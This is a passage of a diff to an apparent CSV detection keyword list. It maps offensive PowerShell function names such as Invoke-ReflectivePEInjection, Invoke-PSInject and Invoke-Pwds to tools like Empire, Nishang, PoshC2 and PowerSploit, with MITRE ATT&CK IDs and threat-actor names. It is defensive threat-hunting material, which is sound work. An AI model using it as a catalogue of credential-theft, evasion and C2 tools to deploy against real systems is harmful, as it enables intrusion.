T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PSImage*","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027 - T1218 - T1216 - T1059","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","10","2075","401","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z" -"*Invoke-PSInject*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PSInject.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PsUACme*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Invoke-PsUACme*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PsUACme*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-PSInject*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSInject.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSInject.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-PsUACme*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-PsUACme*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PsUACme*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-Pwds.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*Invoke-RBDC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-RBDC-over-DAVRPC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RBDC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RBDC-over-DAVRPC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-RDPwrap.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ReflectivePEInjection*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Invoke-ReflectivePEInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - 